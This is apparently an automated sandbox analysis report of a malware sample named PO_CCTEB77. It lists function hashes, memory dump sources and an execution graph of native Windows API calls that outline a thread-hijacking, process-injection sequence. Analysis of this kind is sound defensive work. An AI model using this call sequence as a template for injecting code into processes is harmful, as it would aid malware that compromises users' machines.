                                                                            • Opcode ID: 843e1e544d33ca875792b26635db53a6de4bbb4d6e8efc818747300d3cb3aafe
                                                                            • Instruction ID: 6381d220e76d658bbd127878a0f4a91c0f670420d4f1323fa23621467c3cee2a
                                                                            • Opcode Fuzzy Hash: 843e1e544d33ca875792b26635db53a6de4bbb4d6e8efc818747300d3cb3aafe
                                                                            • Instruction Fuzzy Hash: B3311AB0E056149FEB58CF6BC94468EFBF3AFC9201F08D1AAD408AB215DB349945CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0834D570 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 4028bfe624187194182e2a326ff40bdc47b2522a86ed72c8d735481c199ab5b8
                                                                            • Instruction ID: f0345d2ad87359af9552551828ebd14921a7207ef9caa175d1985ffba374a633
                                                                            • Opcode Fuzzy Hash: 4028bfe624187194182e2a326ff40bdc47b2522a86ed72c8d735481c199ab5b8
                                                                            • Instruction Fuzzy Hash: 6F312AB1E016189FEB18CF6BD94068EFBF3AFC9311F04D1AAD418AB214DB349A458F55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797DF00 Relevance: .4, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c501e41fe682a7d8b5f600897acf23b30790ed1d71f5f043b9a233de5c770f5c
                                                                            • Instruction ID: d64f351484588fb8958b6cc8b4a5fab70481c0db87756acb29fc2f8ada9650ba
                                                                            • Opcode Fuzzy Hash: c501e41fe682a7d8b5f600897acf23b30790ed1d71f5f043b9a233de5c770f5c
                                                                            • Instruction Fuzzy Hash: 09D1CBB17017058FDB29DB75C450B6EBBFAAFC9708F1884ADD1568B2A0DB35E802CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06520040 Relevance: .3, Instructions: 315COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f26c5cdd8c392912f7649e26facc462950555b767eefe1606219b04edd89e1f
                                                                            • Instruction ID: b36905db53b152a7283b66354d2e9530c12f382586a567b0e6a23d355f70967c
                                                                            • Opcode Fuzzy Hash: 3f26c5cdd8c392912f7649e26facc462950555b767eefe1606219b04edd89e1f
                                                                            • Instruction Fuzzy Hash: FC12A6B44017458BD318EF65EC4C1897BB6FB4A32CB504309DA652B2E9DBB815CACF6C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797321A Relevance: .3, Instructions: 268COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3b8cdc678ed69fe9430cf2b8ac062b205d04d434982f0a0b316825c93a02dd2
                                                                            • Instruction ID: ffbc2322c66da9e5cddf109a3312d3d67aec1371463de17a1de13e0204ff562b
                                                                            • Opcode Fuzzy Hash: f3b8cdc678ed69fe9430cf2b8ac062b205d04d434982f0a0b316825c93a02dd2
                                                                            • Instruction Fuzzy Hash: 65D11535C2065A8ACB11EF75D990A9DB7B1FF95300F10CB9AD0497B224EB706AD8CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315E024 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83180131c88c958c79d9c0b43cdcdcb188c8ffed39c5aed25dcb6377ce3d055b
                                                                            • Instruction ID: b88ba72b6963ab15674d23e4213113fb785b5cf257851c8982bbdaf8e4d31b62
                                                                            • Opcode Fuzzy Hash: 83180131c88c958c79d9c0b43cdcdcb188c8ffed39c5aed25dcb6377ce3d055b
                                                                            • Instruction Fuzzy Hash: 24A16D36E00209CFCF09DFB5C4845DEB7B2FF88300B1985AAE911AB265DB71DA56CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07973228 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5c866d5179cb9df873a92b4acab6c29d31badd670aee44dc74105c7ab9615b28
                                                                            • Instruction ID: d8af71eea0f397556dda3fea2ff928defce63149743595da80ccbe08ff94f0ba
                                                                            • Opcode Fuzzy Hash: 5c866d5179cb9df873a92b4acab6c29d31badd670aee44dc74105c7ab9615b28
                                                                            • Instruction Fuzzy Hash: 8BD10635C2065A8ACB11EF75D990A9DB3B1FF95300F10CB9AD0497B224EB706AD9CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06520006 Relevance: .2, Instructions: 245COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f39ed1d55d8d6e8bebabcdda762ad59539fcf24c638ddc694dfe8934b5be314f
                                                                            • Instruction ID: 2a6f24701fb7c6ea847db1a82a20d8845f84c8f89f5d4525badd967993dc702a
                                                                            • Opcode Fuzzy Hash: f39ed1d55d8d6e8bebabcdda762ad59539fcf24c638ddc694dfe8934b5be314f
                                                                            • Instruction Fuzzy Hash: B5D13AB08017458FD719EF25EC481897BB6FB8A328F514309D5616F2E9DBB814CACF68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0834D369 Relevance: .1, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d149ff43a13a5f60b0ac0467ce609cd41b32275f8526fb70de28f0cabf3c1d8
                                                                            • Instruction ID: 75751e46f3ae24b03200110c7dbfccfd7c73d47381af644c467e5d66a84bd5f3
                                                                            • Opcode Fuzzy Hash: 0d149ff43a13a5f60b0ac0467ce609cd41b32275f8526fb70de28f0cabf3c1d8
                                                                            • Instruction Fuzzy Hash: D4411AB4E0520A9FDB04CFA9C5415AEFBF6EF89300F24E46AC415A7314D734AA428BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0834D378 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 384d4c5883f68900ae50ce7633b991585d775985940bac4a6bbeab8256b4574f
                                                                            • Instruction ID: 85824bd886d6ac78166014c732e05f16b7d3d2f657531a44c0ed21452de9897a
                                                                            • Opcode Fuzzy Hash: 384d4c5883f68900ae50ce7633b991585d775985940bac4a6bbeab8256b4574f
                                                                            • Instruction Fuzzy Hash: 8B41F8B1E0520A9FDB04CFA9C5815AEFBF6FF89300F24E46AC415A7714D734AA428B94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0834818A Relevance: .1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce93584a41623d5ab13ef076f09f884d7196e794b3af075baa1f63ace1f76d34
                                                                            • Instruction ID: 2f8b969c3b0be3fbe60833abf1ff0a81ed5b33d288584842df22bfe73f6d5bac
                                                                            • Opcode Fuzzy Hash: ce93584a41623d5ab13ef076f09f884d7196e794b3af075baa1f63ace1f76d34
                                                                            • Instruction Fuzzy Hash: 0521FDB1E006189FEB58CF6BD84069EFBF3AFC9200F14C0BAD518A6254EB341A458F61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797168B Relevance: .1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 545bde5157bc4f177dfd237d98b6c56bff6a9a31bff0f95f5f36394f682ed069
                                                                            • Instruction ID: e412a442fe4bcb424b65971dc40e94a4be92755cb40a7b9818dcfd79b60e8938
                                                                            • Opcode Fuzzy Hash: 545bde5157bc4f177dfd237d98b6c56bff6a9a31bff0f95f5f36394f682ed069
                                                                            • Instruction Fuzzy Hash: E4214F70E097599FDB09CFAA884059EBFF7AFCA200F19C0AAD448E7265D7344905CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 08348198 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f92cbe3995341dab7ef58347c43fc90396c3cecaa38ba27b33edede12cc4e56
                                                                            • Instruction ID: 2bdd011c7b87ebc161ded4e8f8e3063f33d12785e4016a700a50c62a9f7243d5
                                                                            • Opcode Fuzzy Hash: 6f92cbe3995341dab7ef58347c43fc90396c3cecaa38ba27b33edede12cc4e56
                                                                            • Instruction Fuzzy Hash: 4521DBB1E006189FEB18DFABD84069EFBF7BFC8200F14C07AD918A6254EB345A458F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 079716B8 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42cf8b2661ca7b4c77b8d890087c7b1bd4c64ff960f0b43d53090b073dff233d
                                                                            • Instruction ID: 6d2cad7ef39517131bee2d6469c77cf618e7fde126c9d7f1e5b438ab8a1dd052
                                                                            • Opcode Fuzzy Hash: 42cf8b2661ca7b4c77b8d890087c7b1bd4c64ff960f0b43d53090b073dff233d
                                                                            • Instruction Fuzzy Hash: 0A2106B1E116199BDB08CFABD9406AEFBF7AFC8210F14C12AD518A7214EB348A15CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 08345A90 Relevance: 6.3, Strings: 5, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                            • API String ID: 0-4248691736
                                                                            • Opcode ID: 66b6ca1dea50fb464eef0058e8392d25db049e94e2291bb3bb9ebfd858942cfa
                                                                            • Instruction ID: 45056e25dc634b55d73c1d32ca7b0eda698bdab3d8cd41a07936b1a9e4d541ab
                                                                            • Opcode Fuzzy Hash: 66b6ca1dea50fb464eef0058e8392d25db049e94e2291bb3bb9ebfd858942cfa
                                                                            • Instruction Fuzzy Hash: 2D217170F0110A9FCB0CEFAAE5905EE7BB6FF80600F1045A9C045AB265EF346D058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 08345AA0 Relevance: 6.3, Strings: 5, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                            • API String ID: 0-4248691736
                                                                            • Opcode ID: 49a38009a6da09793878ccdc9e8d11f75a4ea431a284c5be915cd0d683cb42d3
                                                                            • Instruction ID: e0718122287922524ba0e49f50849c9fe2ab9f4e2e684933d1ca2c4bd5fa0ead
                                                                            • Opcode Fuzzy Hash: 49a38009a6da09793878ccdc9e8d11f75a4ea431a284c5be915cd0d683cb42d3
                                                                            • Instruction Fuzzy Hash: 7B214130B0110A9FCB0CEFAAD5909EE7BB6FF90600F504469C145AB264EF34AD05CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:1.8%
                                                                            Signature Coverage:11.1%
                                                                            Total number of Nodes:397
                                                                            Total number of Limit Nodes:35
                                                                            execution_graph 88196 1802b60 LdrInitializeThunk 88197 42b363 88198 42b373 88197->88198 88199 42b379 88197->88199 88202 42a363 88199->88202 88201 42b39f 88205 428713 88202->88205 88204 42a37e 88204->88201 88206 42872d 88205->88206 88209 429463 88206->88209 88208 42873e RtlAllocateHeap 88208->88204 88210 429472 88209->88210 88212 4294d8 88209->88212 88210->88212 88213 423e53 88210->88213 88212->88208 88214 423e61 88213->88214 88215 423e6d 88213->88215 88214->88215 88218 4242d3 LdrLoadDll 88214->88218 88215->88212 88217 423fbf 88217->88212 88218->88217 88219 4239c3 88220 4239df 88219->88220 88231 428143 88220->88231 88223 423a07 88225 428453 2 API calls 88223->88225 88224 423a1b 88235 428453 88224->88235 88227 423a10 88225->88227 88228 423a24 88239 42a3a3 LdrLoadDll RtlAllocateHeap 88228->88239 88230 423a2f 88232 428160 88231->88232 88233 429463 LdrLoadDll 88232->88233 88234 423a00 88233->88234 88234->88223 88234->88224 88236 428470 88235->88236 88237 429463 LdrLoadDll 88236->88237 88238 428481 NtClose 88237->88238 88238->88228 88239->88230 88240 4281e3 88241 428207 88240->88241 88242 42825d 88240->88242 88244 429463 LdrLoadDll 88241->88244 88243 429463 LdrLoadDll 88242->88243 88245 428273 88243->88245 88246 428221 88244->88246 88249 40ab73 88246->88249 88248 428256 88252 40ab95 88249->88252 88250 40acb2 NtCreateFile 88251 40acf1 88250->88251 88251->88248 88252->88250 88552 423d53 88557 423d62 88552->88557 88553 423de9 88554 423da6 88555 42a283 2 API calls 88554->88555 88556 423db6 88555->88556 88557->88553 88557->88554 88558 423de4 88557->88558 88559 42a283 2 API calls 88558->88559 88559->88553 88560 428313 88561 428337 88560->88561 88562 428385 88560->88562 88564 429463 LdrLoadDll 88561->88564 88563 429463 LdrLoadDll 88562->88563 88566 42839b 88563->88566 88565 428351 88564->88565 88569 40ada3 88565->88569 88568 42837e 88572 40adc5 88569->88572 88570 40aee2 NtReadFile 88571 40af19 88570->88571 88571->88568 88572->88570 88573 41d653 88574 41d679 88573->88574 88575 423e53 LdrLoadDll 88574->88575 88577 41d6cd 88575->88577 88576 41da46 88577->88576 88620 4287f3 LdrLoadDll 88577->88620 88579 41d71e 88580 41da2e 88579->88580 88621 42b493 88579->88621 88582 42a283 2 API calls 88580->88582 88582->88576 88583 41d73d 88583->88580 88584 41d846 88583->88584 88585 427bb3 2 API calls 88583->88585 88627 418713 LdrLoadDll LdrInitializeThunk 88584->88627 88586 41d7c4 88585->88586 88586->88584 88589 41d7cc 88586->88589 88588 41d871 88588->88580 88593 41d8a6 88588->88593 88630 418603 NtMapViewOfSection LdrLoadDll 88588->88630 88589->88576 88590 41d82c 88589->88590 88592 41d7fb 88589->88592 88628 418603 NtMapViewOfSection LdrLoadDll 88589->88628 88591 42a283 2 API calls 88590->88591 88596 41d83c 88591->88596 88595 428453 2 API calls 88592->88595 88600 41d8d6 88593->88600 88601 41da0d 88593->88601 88598 41d80b 88595->88598 88629 4259a3 NtDelayExecution LdrLoadDll 88598->88629 88631 4284f3 LdrLoadDll 88600->88631 88603 42a283 2 API calls 88601->88603 88604 41da24 88603->88604 88605 41d8f5 88606 41a4a3 3 API calls 88605->88606 88607 41d95e 88606->88607 88607->88580 88608 41d969 88607->88608 88609 42a283 2 API calls 88608->88609 88610 41d98d 88609->88610 88632 427e13 LdrLoadDll 88610->88632 88612 41d9a1 88613 427d53 2 API calls 88612->88613 88614 41d9c8 88613->88614 88615 41d9cf 88614->88615 88633 427e13 LdrLoadDll 88614->88633 88617 41d9f5 88618 4279c3 2 API calls 88617->88618 88619 41da03 88618->88619 88620->88579 88622 42b403 88621->88622 88623 42b460 88622->88623 88624 42a363 2 API calls 88622->88624 88623->88583 88625 42b43d 88624->88625 88626 42a283 2 API calls 88625->88626 88626->88623 88627->88588 88628->88592 88629->88590 88630->88593 88631->88605 88632->88612 88633->88617 88634 41a5f3 88642 4277b3 88634->88642 88636 41a637 88637 41a658 88636->88637 88649 427943 88636->88649 88639 41a648 88640 41a664 88639->88640 88641 428453 2 API calls 88639->88641 88641->88637 88643 42780e 88642->88643 88644 4277d4 88642->88644 88646 429463 LdrLoadDll 88643->88646 88645 429463 LdrLoadDll 88644->88645 88647 4277ee 88645->88647 88648 427824 88646->88648 88647->88636 88648->88636 88650 427967 88649->88650 88651 427999 88649->88651 88653 429463 LdrLoadDll 88650->88653 88652 429463 LdrLoadDll 88651->88652 88656 4279af 88652->88656 88654 427981 88653->88654 88658 409d23 88654->88658 88656->88639 88657 427992 88657->88639 88661 409d45 88658->88661 88659 409e62 NtSuspendThread 88660 409e7d 88659->88660 88660->88657 88661->88659 88662 413bf3 88663 413c0d 88662->88663 88670 4173f3 88663->88670 88665 413c2b 88666 423e53 LdrLoadDll 88665->88666 88667 413c41 88666->88667 88668 413c70 88667->88668 88669 413c5f PostThreadMessageW 88667->88669 88669->88668 88671 417417 88670->88671 88672 417453 LdrLoadDll 88671->88672 88673 41741e 88671->88673 88672->88673 88673->88665 88674 4185d8 88675 428453 2 API calls 88674->88675 88676 4185e2 88675->88676 88253 401b2f 88254 401b44 88253->88254 88257 42b803 88254->88257 88260 429e73 88257->88260 88261 429e99 88260->88261 88272 416323 88261->88272 88263 429eaf 88264 401b99 88263->88264 88275 41a413 88263->88275 88266 429ece 88267 429ee3 88266->88267 88291 4287b3 88266->88291 88287 426253 88267->88287 88270 429ef2 88271 4287b3 2 API calls 88270->88271 88271->88264 88274 416330 88272->88274 88295 416273 88272->88295 88274->88263 88276 41a43f 88275->88276 88333 417783 88276->88333 88278 41a451 88337 41a303 88278->88337 88281 41a484 88283 41a495 88281->88283 88286 428453 2 API calls 88281->88286 88282 41a46c 88284 41a477 88282->88284 88285 428453 2 API calls 88282->88285 88283->88266 88284->88266 88285->88284 88286->88283 88288 4262ad 88287->88288 88289 4262ba 88288->88289 88365 417f23 88288->88365 88289->88270 88292 4287cd 88291->88292 88293 429463 LdrLoadDll 88292->88293 88294 4287de ExitProcess 88293->88294 88294->88267 88296 41628a 88295->88296 88312 425313 LdrLoadDll 88295->88312 88302 425373 88296->88302 88299 416296 88301 4162a3 88299->88301 88305 428df3 88299->88305 88301->88274 88313 4286d3 88302->88313 88307 428e0b 88305->88307 88306 428e2f 88306->88301 88307->88306 88317 427bb3 88307->88317 88312->88296 88314 4286ed 88313->88314 88315 429463 LdrLoadDll 88314->88315 88316 425390 88315->88316 88316->88299 88318 427bd0 88317->88318 88319 429463 LdrLoadDll 88318->88319 88320 427be1 88319->88320 88326 1802c0a 88320->88326 88321 427bfc 88323 42a283 88321->88323 88329 428763 88323->88329 88325 428e9a 88325->88301 88327 1802c11 88326->88327 88328 1802c1f LdrInitializeThunk 88326->88328 88327->88321 88328->88321 88330 428780 88329->88330 88331 429463 LdrLoadDll 88330->88331 88332 428791 RtlFreeHeap 88331->88332 88332->88325 88334 4177c9 88333->88334 88347 417613 LdrLoadDll 88334->88347 88336 41785c 88336->88278 88338 41a3f9 88337->88338 88339 41a31d 88337->88339 88338->88281 88338->88282 88348 4176d3 88339->88348 88341 41a362 88353 427c03 88341->88353 88343 41a3a7 88357 427c53 88343->88357 88346 428453 2 API calls 88346->88338 88347->88336 88349 4176f8 88348->88349 88352 417703 88349->88352 88363 417613 LdrLoadDll 88349->88363 88351 41774b 88351->88341 88352->88341 88354 427c20 88353->88354 88355 429463 LdrLoadDll 88354->88355 88356 427c31 88355->88356 88356->88343 88358 427c70 88357->88358 88359 429463 LdrLoadDll 88358->88359 88360 427c81 88359->88360 88364 18035c0 LdrInitializeThunk 88360->88364 88361 41a3ed 88361->88346 88363->88351 88364->88361 88367 417f4d 88365->88367 88390 4183bb 88367->88390 88391 423363 88367->88391 88368 417fec 88368->88390 88394 413d23 88368->88394 88370 41805a 88371 42a283 2 API calls 88370->88371 88370->88390 88373 418072 88371->88373 88372 4180a4 88378 4180ab 88372->88378 88411 41a4a3 88372->88411 88373->88372 88407 406cc3 88373->88407 88375 4180e4 88375->88390 88418 427d53 88375->88418 88378->88390 88427 427843 88378->88427 88380 418141 88436 4278c3 88380->88436 88382 418161 88383 41834a 88382->88383 88445 406d33 88382->88445 88386 41836d 88383->88386 88453 4279c3 88383->88453 88388 41838a 88386->88388 88449 41a673 88386->88449 88389 4287b3 2 API calls 88388->88389 88389->88390 88390->88289 88462 42a1f3 88391->88462 88393 423384 88393->88368 88396 413d89 88394->88396 88400 413d42 88394->88400 88395 413e97 88395->88370 88396->88395 88406 413e60 88396->88406 88478 4134c3 88396->88478 88399 413e74 88399->88395 88495 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 88399->88495 88400->88395 88400->88396 88401 41a673 2 API calls 88400->88401 88401->88400 88403 413e8d 88403->88370 88404 413dc6 88404->88406 88491 413783 88404->88491 88406->88395 88494 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 88406->88494 88408 406cf3 88407->88408 88409 41a673 2 API calls 88408->88409 88410 406d14 88408->88410 88409->88408 88410->88372 88412 41a4c0 88411->88412 88510 427ca3 88412->88510 88414 41a510 88415 41a517 88414->88415 88416 427d53 2 API calls 88414->88416 88415->88375 88417 41a540 88416->88417 88417->88375 88419 427d74 88418->88419 88420 427dc6 88418->88420 88421 429463 LdrLoadDll 88419->88421 88422 429463 LdrLoadDll 88420->88422 88423 427d8e 88421->88423 88424 427ddc 88422->88424 88523 40a953 88423->88523 88424->88378 88426 427dbf 88426->88378 88428 427896 88427->88428 88429 427864 88427->88429 88430 429463 LdrLoadDll 88428->88430 88431 429463 LdrLoadDll 88429->88431 88432 4278ac 88430->88432 88433 42787e 88431->88433 88432->88380 88527 409f23 88433->88527 88435 42788f 88435->88380 88437 4278e7 88436->88437 88438 427919 88436->88438 88439 429463 LdrLoadDll 88437->88439 88440 429463 LdrLoadDll 88438->88440 88441 427901 88439->88441 88443 42792f 88440->88443 88531 40a123 88441->88531 88443->88382 88444 427912 88444->88382 88446 406d53 88445->88446 88447 41a673 2 API calls 88446->88447 88448 406d73 88446->88448 88447->88446 88448->88383 88450 41a686 88449->88450 88535 427ae3 88450->88535 88452 41a6b1 88452->88386 88454 4279e7 88453->88454 88455 427a19 88453->88455 88456 429463 LdrLoadDll 88454->88456 88457 429463 LdrLoadDll 88455->88457 88458 427a01 88456->88458 88459 427a2f 88457->88459 88548 40a323 88458->88548 88459->88386 88461 427a12 88461->88386 88465 428593 88462->88465 88464 42a224 88464->88393 88466 4285f6 88465->88466 88467 4285b4 88465->88467 88469 429463 LdrLoadDll 88466->88469 88468 429463 LdrLoadDll 88467->88468 88470 4285ce 88468->88470 88473 42860c 88469->88473 88474 40b623 88470->88474 88472 4285ef 88472->88464 88473->88464 88475 40b645 88474->88475 88476 40b762 NtAllocateVirtualMemory 88475->88476 88477 40b78d 88476->88477 88477->88472 88479 4134d3 88478->88479 88480 4134ce 88478->88480 88481 42a1f3 2 API calls 88479->88481 88480->88404 88485 4134f8 88481->88485 88482 41355f 88482->88404 88484 413565 88486 41358f 88484->88486 88488 428683 2 API calls 88484->88488 88485->88482 88485->88484 88490 42a1f3 2 API calls 88485->88490 88496 427b63 88485->88496 88502 428683 88485->88502 88486->88404 88489 413580 88488->88489 88489->88404 88490->88485 88492 428683 2 API calls 88491->88492 88493 4137a5 88492->88493 88493->88406 88494->88399 88495->88403 88497 427b80 88496->88497 88498 429463 LdrLoadDll 88497->88498 88499 427b91 88498->88499 88508 1802df0 LdrInitializeThunk 88499->88508 88500 427ba8 88500->88485 88503 42869d 88502->88503 88504 429463 LdrLoadDll 88503->88504 88505 4286ae 88504->88505 88509 1802c70 LdrInitializeThunk 88505->88509 88506 4286c5 88506->88485 88508->88500 88509->88506 88511 427d0a 88510->88511 88512 427cc4 88510->88512 88513 429463 LdrLoadDll 88511->88513 88514 429463 LdrLoadDll 88512->88514 88515 427d20 88513->88515 88516 427cde 88514->88516 88515->88414 88519 40a733 88516->88519 88518 427d03 88518->88414 88522 40a755 88519->88522 88520 40a872 NtCreateSection 88521 40a8a1 88520->88521 88521->88518 88522->88520 88525 40a975 88523->88525 88524 40aa92 NtMapViewOfSection 88526 40aacd 88524->88526 88525->88524 88526->88426 88530 409f45 88527->88530 88528 40a062 NtGetContextThread 88529 40a07d 88528->88529 88529->88435 88530->88528 88533 40a145 88531->88533 88532 40a262 NtSetContextThread 88534 40a27d 88532->88534 88533->88532 88534->88444 88536 427b07 88535->88536 88537 427b39 88535->88537 88539 429463 LdrLoadDll 88536->88539 88538 429463 LdrLoadDll 88537->88538 88542 427b4f 88538->88542 88540 427b21 88539->88540 88544 40b213 88540->88544 88542->88452 88543 427b32 88543->88452 88547 40b235 88544->88547 88545 40b352 NtDelayExecution 88546 40b36e 88545->88546 88546->88543 88547->88545 88550 40a345 88548->88550 88549 40a462 NtResumeThread 88551 40a47d 88549->88551 88550->88549 88551->88461

                                                                            Executed Functions

                                                                            Function 0040A323 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170nativethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
